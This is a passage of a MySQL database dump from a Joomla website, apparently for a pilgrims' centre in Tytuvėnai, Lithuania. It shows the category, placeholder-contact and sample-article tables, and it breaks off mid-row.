  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`extension`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_path` (`path`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_alias` (`alias`),
  KEY `idx_language` (`language`)
) ENGINE=MyISAM AUTO_INCREMENT=59 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_categories`
--

LOCK TABLES `xyhmu_categories` WRITE;
/*!40000 ALTER TABLE `xyhmu_categories` DISABLE KEYS */;
INSERT INTO `xyhmu_categories` VALUES (1,0,0,0,113,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',135,'2009-10-18 16:07:09',0,'0000-00-00 00:00:00',0,'*'),(2,27,1,1,2,1,'uncategorised','com_content','Uncategorised','uncategorised','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',135,'2010-06-28 13:26:37',0,'0000-00-00 00:00:00',0,'*'),(3,28,1,3,4,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',135,'2010-06-28 13:27:35',0,'0000-00-00 00:00:00',0,'*'),(4,29,1,5,6,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,135,'2018-06-12 08:27:41',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',135,'2010-06-28 13:27:57',0,'0000-00-00 00:00:00',0,'*'),(5,30,1,7,8,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',135,'2010-06-28 13:28:15',0,'0000-00-00 00:00:00',0,'*'),(6,31,1,9,10,1,'uncategorised','com_weblinks','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',135,'2010-06-28 13:28:33',0,'0000-00-00 00:00:00',0,'*'),(7,32,1,11,12,1,'uncategorised','com_users','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',135,'2010-06-28 13:28:33',0,'0000-00-00 00:00:00',0,'*'),(8,35,9,56,57,2,'sample-data-article/joomla','com_content','Joomla','joomla','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-01-31 07:26:07',439,'2013-01-31 08:00:22',0,'*'),(9,37,1,13,58,1,'sample-data-article','com_content','Sample Data Article','sample-data-article','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-01-31 07:51:48',0,'0000-00-00 00:00:00',0,'*'),(10,38,9,14,55,2,'sample-data-article/demo','com_content','Demo','demo','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-01-31 07:52:06',0,'0000-00-00 00:00:00',0,'*'),(11,40,10,15,16,3,'sample-data-article/demo/short-code','com_content','Shortcode','short-code','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-01-31 08:00:08',0,'0000-00-00 00:00:00',0,'*'),(12,60,10,17,18,3,'sample-data-article/demo/university-news','com_content','University News','university-news','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-23 10:30:11',135,'2013-09-23 11:14:20',0,'*'),(13,73,10,19,20,3,'sample-data-article/demo/features','com_content','Features','features','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-24 11:30:04',0,'0000-00-00 00:00:00',0,'*'),(14,83,10,21,30,3,'sample-data-article/demo/portfolio','com_content','Portfolio','portfolio','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-25 08:13:18',0,'0000-00-00 00:00:00',0,'*'),(15,84,14,22,23,4,'sample-data-article/demo/portfolio/2010','com_content','2010','2010','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-25 08:14:23',0,'0000-00-00 00:00:00',0,'*'),(16,85,14,24,25,4,'sample-data-article/demo/portfolio/2011','com_content','2011','2011','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-25 08:14:36',0,'0000-00-00 00:00:00',0,'*'),(17,86,14,26,27,4,'sample-data-article/demo/portfolio/2012','com_content','2012','2012','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-25 08:14:54',135,'2013-09-25 08:15:28',0,'*'),(18,87,14,28,29,4,'sample-data-article/demo/portfolio/2013','com_content','2013','2013','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-25 08:15:14',0,'0000-00-00 00:00:00',0,'*'),(19,115,10,31,54,3,'sample-data-article/demo/courses','com_content','Course list','courses','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-26 06:28:33',135,'2013-09-30 12:13:11',0,'*'),(20,120,19,32,33,4,'sample-data-article/demo/courses/introduction-to-anthropology','com_content','Introduction To Anthropology','introduction-to-anthropology','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:32:00',135,'2013-09-27 10:32:20',0,'*'),(21,121,19,34,35,4,'sample-data-article/demo/courses/biophysical-chemistry','com_content','Biophysical Chemistry  ','biophysical-chemistry','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:33:00',0,'0000-00-00 00:00:00',0,'*'),(22,122,19,36,37,4,'sample-data-article/demo/courses/biostatistics','com_content','Biostatistics','biostatistics','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:33:46',135,'2013-09-27 10:35:56',0,'*'),(23,123,19,38,39,4,'sample-data-article/demo/courses/basic-immunology','com_content','Basic Immunology ','basic-immunology','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:34:14',135,'2013-09-27 10:36:10',0,'*'),(24,124,19,40,41,4,'sample-data-article/demo/courses/endocrinology','com_content','Endocrinology ','endocrinology','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:34:48',135,'2013-09-27 10:36:20',0,'*'),(25,125,19,42,43,4,'sample-data-article/demo/courses/laboratory','com_content','Laboratory ','laboratory','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:35:11',135,'2013-09-27 10:36:30',0,'*'),(26,126,19,44,45,4,'sample-data-article/demo/courses/human-physiology','com_content','Human Physiology ','human-physiology','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:39:06',0,'0000-00-00 00:00:00',0,'*'),(27,127,19,46,47,4,'sample-data-article/demo/courses/plant-biochemistry','com_content','Plant Biochemistry ','plant-biochemistry','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:39:42',0,'0000-00-00 00:00:00',0,'*'),(28,128,19,48,49,4,'sample-data-article/demo/courses/biochemical-immunology','com_content','Biochemical Immunology  ','biochemical-immunology','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:41:12',0,'0000-00-00 00:00:00',0,'*'),(29,129,19,50,51,4,'sample-data-article/demo/courses/bioinformatics','com_content','Bioinformatics','bioinformatics','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:43:08',0,'0000-00-00 00:00:00',0,'*'),(30,130,19,52,53,4,'sample-data-article/demo/courses/economic-principles','com_content','Economic principles','economic-principles','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2013-09-27 10:43:57',0,'0000-00-00 00:00:00',0,'*'),(31,144,1,59,68,1,'apie-centra','com_content','Apie centrą','apie-centra','','',1,135,'2018-06-12 08:31:33',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(32,145,1,69,72,1,'naujienos','com_content','Naujienosa','naujienos','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',135,'2014-04-09 17:38:51',0,'*'),(33,146,1,73,76,1,'tytuvenai','com_content','Tytuvėnai','tytuvenai','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(34,147,1,77,80,1,'piligrimai','com_content','Piligrimai','piligrimai','','',1,135,'2017-01-03 09:05:36',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(35,148,1,81,84,1,'muziejus','com_content','Muziejus','muziejus','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(36,149,1,85,90,1,'galerija','com_content','Galerija','galerija','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(37,150,1,91,94,1,'vienuolynas','com_content','Vienuolynas','vienuolynas','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(38,151,1,95,96,1,'turizmass','com_content','Turizmas','turizmass','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',135,'2014-04-10 06:27:11',0,'*'),(39,152,1,97,98,1,'piligrim-centro-straipsniai','com_content','Tytuvėnų piligrimų centras','piligrim-centro-straipsniai','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',135,'2014-04-09 17:37:43',0,'*'),(40,153,31,60,61,2,'apie-centra/the-cms','com_content','The CMS','the-cms','','Information about the software behind Joomla!<br />',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(41,154,31,62,63,2,'apie-centra/projektai','com_content','Projektai','projektai','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(42,155,31,64,65,2,'apie-centra/naujienos','com_content','Naujienos','naujienos','','',0,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(43,156,31,66,67,2,'apie-centra/general','com_content','General','general','','',1,135,'2017-01-03 09:02:48',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(44,157,1,99,100,1,'paskutinesnaujienos','com_content','Naujienos','paskutinesnaujienos','','<p>VšĮ ,,Tytuvėnų piligrimų centras\'\' vasario 7-9 d. pristatatė Kelmės kraštą, pagrindinius lankytinus objektus, turistinius ir piligriminius maršrutus Rygoje vykusioje tarptautinėje turizmo parodoje Balttour\'25. Stendo lankytojai domėjosi lankytinais objektais, dalyvavo loterijoje.</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',135,'2025-02-12 11:28:23',0,'*'),(45,158,32,70,71,2,'naujienos/newsflash','com_content','Newsflash','newsflash','','',-2,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(46,159,33,74,75,2,'tytuvenai/apie-tytuvenus','com_content','Apie Tytuvėnus','apie-tytuvenus','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(47,160,34,78,79,2,'piligrimai/piligrimai','com_content','Piligrimai','piligrimai','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(48,161,35,82,83,2,'muziejus/muziejus','com_content','Muziejus','muziejus','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(49,162,36,86,87,2,'galerija/tytuvenu-krastas','com_content','Tytuvėnų kraštas','tytuvenu-krastas','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(50,163,36,88,89,2,'galerija/muziejus-galerija','com_content','Muziejus','muziejus-galerija','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(51,164,37,92,93,2,'vienuolynas/vienuolynas','com_content','Vienuolynas','vienuolynas','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',0,'0000-00-00 00:00:00',0,'*'),(52,165,1,103,104,1,'turizmas','com_content','Turizmo informacija','turizmas','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',135,'2014-04-10 06:27:23',0,'*'),(53,166,1,101,102,1,'veikla','com_content','Veikla','veikla','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-09 17:33:07',135,'2014-04-09 19:08:06',0,'*'),(55,274,1,105,108,1,'tytuvenu-festivalis','com_content','Tytuvėnų festivalis','tytuvenu-festivalis','','<p>Tytuvėnų festivalis</p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-17 20:18:45',0,'0000-00-00 00:00:00',0,'*'),(56,275,55,106,107,2,'tytuvenu-festivalis/naujienos','com_content','Naujienos','naujienos','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-04-17 20:19:53',0,'0000-00-00 00:00:00',0,'*'),(57,297,1,109,110,1,'projektai','com_content','Projektai','projektai','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2014-09-25 04:23:05',0,'0000-00-00 00:00:00',0,'*'),(58,468,1,111,112,1,'trasos','com_content','Trasos','trasos','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',135,'2022-09-19 19:34:12',0,'0000-00-00 00:00:00',0,'*');
/*!40000 ALTER TABLE `xyhmu_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_contact_details`
--

DROP TABLE IF EXISTS `xyhmu_contact_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_contact_details` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `con_position` varchar(255) DEFAULT NULL,
  `address` text,
  `suburb` varchar(100) DEFAULT NULL,
  `state` varchar(100) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `postcode` varchar(100) DEFAULT NULL,
  `telephone` varchar(255) DEFAULT NULL,
  `fax` varchar(255) DEFAULT NULL,
  `misc` mediumtext,
  `image` varchar(255) DEFAULT NULL,
  `imagepos` varchar(20) DEFAULT NULL,
  `email_to` varchar(255) DEFAULT NULL,
  `default_con` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `mobile` varchar(255) NOT NULL DEFAULT '',
  `webpage` varchar(255) NOT NULL DEFAULT '',
  `sortname1` varchar(255) NOT NULL,
  `sortname2` varchar(255) NOT NULL,
  `sortname3` varchar(255) NOT NULL,
  `language` char(7) NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `metadata` text NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`published`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_contact_details`
--

LOCK TABLES `xyhmu_contact_details` WRITE;
/*!40000 ALTER TABLE `xyhmu_contact_details` DISABLE KEYS */;
INSERT INTO `xyhmu_contact_details` VALUES (1,'Contact Name','name','Position','Street Address','Suburb','State','Country','Zip Code','Telephone','Fax','<p>Information about or by the contact.</p>','',NULL,'email@email.com',0,1,135,'2017-12-11 12:45:48',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"Facebook\",\"linka\":\"http:\\/\\/www.facebook.com\\/joomla\",\"linkb_name\":\"Twitter\",\"linkb\":\"http:\\/\\/twitter.com\\/joomla\",\"linkc_name\":\"\",\"linkc\":null,\"linkd_name\":\"\",\"linkd\":null,\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,4,1,'','','last','first','middle','*','2013-01-31 07:52:56',135,'','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00'),(2,'Contact From','contact-from','Web Developer','1209 Willow Oaks Lane','New York','Lafayette','United States','1200','+088123456','415-255-8156','','',NULL,'email@example.com',0,1,0,'0000-00-00 00:00:00',2,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"0\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":false,\"linkb_name\":\"\",\"linkb\":false,\"linkc_name\":\"\",\"linkc\":false,\"linkd_name\":\"\",\"linkd\":false,\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"0\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,4,1,'632746238745','http://www.joomshaper.com','','','','*','2013-10-03 10:42:15',135,'','2013-10-03 11:10:38',135,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `xyhmu_contact_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_content`
--

DROP TABLE IF EXISTS `xyhmu_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_content` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `title_alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '' COMMENT 'Deprecated in Joomla! 3.0',
  `introtext` mediumtext NOT NULL,
  `fulltext` mediumtext NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `sectionid` int(10) unsigned NOT NULL DEFAULT '0',
  `mask` int(10) unsigned NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` text NOT NULL,
  `urls` text NOT NULL,
  `attribs` varchar(5120) NOT NULL,
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `parentid` int(10) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `metadata` text NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `language` char(7) NOT NULL COMMENT 'The language code for the article.',
  `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=MyISAM AUTO_INCREMENT=398 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_content`
--

LOCK TABLES `xyhmu_content` WRITE;
/*!40000 ALTER TABLE `xyhmu_content` DISABLE KEYS */;
INSERT INTO `xyhmu_content` VALUES (1,36,'The Joomla! Community','the-joomla-community','','<p>Joomla! means All Together, and it is a community of people all working and having fun together that makes Joomla! possible. Thousands of people each year participate in the Joomla! community, and we hope you will be one of them.</p>\r\n<p>People with all kinds of skills, of all skill levels and from around the world are welcome to join in. Participate in the <a href=\"http://joomla.org\">Joomla.org</a> family of websites (the<a href=\"http://forum.joomla.org\"> forum </a>is a great place to start). Come to a <a href=\"http://community.joomla.org/events.html\">Joomla! event</a>. Join or start a <a href=\"http://community.joomla.org/user-groups.html\">Joomla! Users Group</a>. Whether you are a developer, site administrator, designer, end user or fan, there are ways for you to participate and contribute.</p>','',-2,0,0,8,'2013-01-31 07:27:02',135,'','2013-01-31 09:03:15',439,0,'0000-00-00 00:00:00','2013-01-31 07:27:02','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,3,'','',1,186,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(2,39,'Module Variations','module-variations','','<p>Welcome to Shaper <strong>Helix</strong> template. This is the blank template for joomla based on Helix Framewok. You are seeing main content area of this template.</p>','',-2,0,0,10,'2013-01-31 07:53:08',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-01-31 07:53:08','0000-00-00 